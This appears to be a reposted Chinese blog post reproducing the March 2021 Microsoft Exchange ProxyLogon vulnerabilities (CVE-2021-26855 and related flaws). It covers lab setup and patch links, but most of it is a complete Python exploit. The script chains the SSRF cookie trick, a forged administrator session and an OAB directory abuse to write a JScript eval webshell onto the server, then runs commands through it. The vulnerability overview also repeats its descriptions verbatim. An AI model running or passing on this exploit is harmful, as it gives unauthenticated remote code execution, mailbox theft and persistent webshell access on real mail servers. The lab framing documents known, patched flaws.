当前位置:   article > 正文

(环境搭建+复现)CVE-2021-26855 2021年3月 Exchange Server RCE 复现_exchange proxylogon 复现

exchange proxylogon 复现

0x00 简介

Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。

0x01 漏洞概述

  1. CVE-2021-26855
  2. 该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。
  3. 危害:该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。
  4. CVE-2021-26857
  5. 该漏洞是Unified Messaging 服务中的不安全的反序列化漏洞。利用该漏洞,攻击者可以发送精心构造的恶意请求,从而在Exchange Server上以SYSTEM身份执行任意代码。
  6. 危害:该漏洞是Unified Messaging 服务中的不安全的反序列化漏洞。利用该漏洞,攻击者可以发送精心构造的恶意请求,从而在Exchange Server上以SYSTEM身份执行任意代码。
  7. CVE-2021-26858
  8. 该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证,利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。
  9. 危害:该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证,利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。
  10. CVE-2021-27065
  11. 该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证,利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。
  12. 危害:该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证,利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。

0x02 影响版本

Microsoft Exchange 2013

Microsoft Exchange 2016

Microsoft Exchange 2019

Microsoft Exchange 2010

0x03 环境搭建

一、安装AD域控。

1、我使用的是windows server 2016。点击管理>添加角色和功能向导,选择Active Directory 域服务 和 DNS 服务器。

2、一路点击下一步到安装。

3、点击"将此服务器提升为域控制器",这里选择添加新林,然后给自己主机定义一个内部域名,最好和外部域名称不同。我这里设置的是ex.com。

4、设置密码。

5、点击下一步,显示无法创建DNS服务器委派,无视,下一步。

6、选择安装的位置以及日志文件位置。

7、如果提示

域控制器升级的先决条件验证失败。 新建域时,本地 Administrator 帐户将成为域 Administrator 帐户。无法新建域,因为本地 Administrator 帐户密码不符合要求。

目前,本地 Administrator 密码为空白,这可能会导致安全问题。我们建议你按 Ctrl+Alt+Delete,使用网络用户命令行工具,或者在使用本地用户和组为本地 Administrator 帐户设置强密码之后,新建域。

可参考:https://blog.csdn.net/qq_41863998/article/details/103562080

8、安装完成后自动重启即完成。

二、安装 Exchange Server 2016

  1. 1、然后下载Exchange
  2. https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=102114
  3. 然后下载.NET4.8
  4. https://docs.microsoft.com/zh-cn/exchange/plan-and-deploy/prerequisites?view=exchserver-2016
  5. 下载C++ 依赖包
  6. https://www.microsoft.com/en-us/download/details.aspx?id=30679

有个坑。就是安装Visual C++ Redistributable Packages for Visual Studio 2013

记得下载的时候选择英文。。中文的会检测的时候一直通不过

2、开始安装,选择不更新。

3、启用exchange自带的杀毒。

4、配置先决条件出错。主要问题是"需要对 Active Directory 进行全局更新,并且此用户帐户不是 'Enterprise Admins' 组的成员。"

我把user用户和administrator添加到要求的组里然后,切换用户到administrator试了试安装就可以了。

5、安装

6、安装成功后访问https://localhost/ecp 即可到达exchange管理中心。

7、使用域名\用户名,密码即可登录管理中心。

0x04 漏洞利用

1、尝试 CVE-2021-26855 SSRF漏洞。

2、执行exp。

修改了一下exp,如果不知道用户名可以直接指定后缀,会自动测试常用用户名。

exp.py -u 127.0.0.1 -suffix @ex.com

如果知道一个存在的用户就直接

exp.py -u 127.0.0.1 -user admin@ex.com

  1. # -*- coding: utf-8 -*-
  2. import requests
  3. from urllib3.exceptions import InsecureRequestWarning
  4. import random
  5. import string
  6. import argparse
  7. parser = argparse.ArgumentParser(description='Example: python exp.py -u 127.0.0.1 -email test -suffix @ex.com\n如果不清楚用户名,可不填写-email参数,将自动Fuzz用户名。')
  8. parser.add_argument('-u', type=str,
  9. help='target')
  10. parser.add_argument('-user',
  11. help='exist email',default='')
  12. parser.add_argument('-suffix',
  13. help='email suffix')
  14. args = parser.parse_args()
  15. def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
  16. return ''.join(random.choice(chars) for _ in range(size))
  17. proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
  18. requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
  19. target=args.u
  20. suffix=args.suffix
  21. exist_email=args.user
  22. fuzz_email=['administrator','webmaste','support','sales','contact','admin','test','test2','test01','test1','guest','sysadmin','info','noreply','log','no-reply']
  23. fuzz_email.insert(0,exist_email)
  24. random_name = id_generator(4) + ".js"
  25. user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
  26. shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx"
  27. shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
  28. # webshell-马子内容
  29. shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>'
  30. for i in fuzz_email:
  31. new_email=i+suffix
  32. autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  33. <Request>
  34. <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  35. </Request>
  36. </Autodiscover>
  37. """ % new_email
  38. print("正在获取Exchange Server " + target+" 权限")
  39. FQDN = "EXCHANGE01"
  40. ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
  41. "User-Agent": user_agent},
  42. verify=False,proxies=proxies)
  43. if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
  44. FQDN = ct.headers["X-FEServer"]
  45. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
  46. "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
  47. "Content-Type": "text/xml",
  48. "User-Agent": user_agent},
  49. data=autoDiscoverBody,
  50. proxies=proxies,
  51. verify=False
  52. )
  53. if ct.status_code != 200:
  54. print(ct.status_code)
  55. print("Autodiscover Error!")
  56. #exit()
  57. if "<LegacyDN>" not in str(ct.content):
  58. print("Can not get LegacyDN!")
  59. #exit()
  60. try:
  61. legacyDn = str(ct.content).split("<LegacyDN>")[1].split(r"</LegacyDN>")[0]
  62. print("Got DN: " + legacyDn)
  63. mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
  64. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
  65. "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
  66. "Content-Type": "application/mapi-http",
  67. "X-Requesttype": "Connect",
  68. "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}",
  69. "X-Clientapplication": "Outlook/15.0.4815.1002",
  70. "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456",
  71. "User-Agent": user_agent
  72. },
  73. data=mapi_body,
  74. verify=False,
  75. proxies=proxies
  76. )
  77. if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content):
  78. print("Mapi Error!")
  79. exit()
  80. sid = str(ct.content).split("with SID ")[1].split(" and MasterAccountSid")[0]
  81. print("Got SID: " + sid)
  82. sid = sid.replace(sid.split("-")[-1],"500")
  83. proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
  84. """ % sid
  85. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
  86. "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
  87. "Content-Type": "text/xml",
  88. "msExchLogonMailbox": "S-1-5-20",
  89. "User-Agent": user_agent
  90. },
  91. data=proxyLogon_request,
  92. proxies=proxies,
  93. verify=False
  94. )
  95. if ct.status_code != 241 or not "set-cookie" in ct.headers:
  96. print("Proxylogon Error!")
  97. exit()
  98. sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0]
  99. msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
  100. print("Got session id: " + sess_id)
  101. print("Got canary: " + msExchEcpCanary)
  102. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
  103. #"Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
  104. #FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
  105. "Cookie": "X-BEResource=Admin@{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={sess_id}; msExchEcpCanary={msExchEcpCanary1}".
  106. format(server_name=FQDN, msExchEcpCanary1=msExchEcpCanary, sess_id=sess_id,
  107. msExchEcpCanary=msExchEcpCanary),
  108. "Content-Type": "application/json; charset=utf-8",
  109. "msExchLogonMailbox": "S-1-5-20",
  110. "User-Agent": user_agent
  111. },
  112. json={"filter": {
  113. "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
  114. "SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}},
  115. verify=False,
  116. proxies=proxies
  117. )
  118. if ct.status_code != 200:
  119. print("GetOAB Error!")
  120. exit()
  121. oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0]
  122. print("Got OAB id: " + oabId)
  123. oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
  124. "properties": {
  125. "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
  126. "ExternalUrl": "http://ffff/#%s" % shell_content}}}
  127. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
  128. "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
  129. FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
  130. "msExchLogonMailbox": "S-1-5-20",
  131. "Content-Type": "application/json; charset=utf-8",
  132. "User-Agent": user_agent
  133. },
  134. json=oab_json,
  135. proxies=proxies,
  136. verify=False
  137. )
  138. if ct.status_code != 200:
  139. print("Set external url Error!")
  140. exit()
  141. reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
  142. "properties": {
  143. "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
  144. "FilePathName": shell_absolute_path}}}
  145. ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
  146. "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
  147. FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
  148. "msExchLogonMailbox": "S-1-5-20",
  149. "Content-Type": "application/json; charset=utf-8",
  150. "User-Agent": user_agent
  151. },
  152. json=reset_oab_body,
  153. proxies=proxies,
  154. verify=False
  155. )
  156. if ct.status_code != 200:
  157. print("写入shell失败了啊")
  158. exit()
  159. print("成功了。马上就验证shell是否OK!")
  160. print("POST shell:https://"+target+"/owa/auth/test11.aspx")
  161. shell_url="https://"+target+"/owa/auth/test11.aspx"
  162. print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());')
  163. print("正在请求shell")
  164. import time
  165. time.sleep(1)
  166. data=requests.post(shell_url,data={"code":"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"},verify=False,proxies=proxies)
  167. if data.status_code != 200:
  168. print("写入shell失败")
  169. else:
  170. print("shell:"+data.text.split("OAB (Default Web Site)")[0].replace("Name : ",""))
  171. print('[+]用户名: '+new_email)
  172. break;
  173. except:
  174. print('[-]用户名: '+new_email)
  175. print("=============================")

0x05 修复方式

1、微软官方已经发布了解决上述漏洞的安全更新,建议受影响用户尽快升级到安全版本,官方安全版本下载可以参考以下链接:

CVE-2021-26855: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855

CVE-2021-26857: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857

CVE-2021-26858: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858

CVE-2021-27065: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065

2、若无法及时进行升级,建议采用官方的临时措施进行防御:

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

Referer:

1、http://www.hackdig.com/03/hack-295366.htm

2、https://blog.csdn.net/zhaowei198311/article/details/107391577

3、https://www.o2oxy.cn/3169.html

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/2023面试高手/article/detail/150739
推荐阅读
相关标签
  

闽ICP备14008679号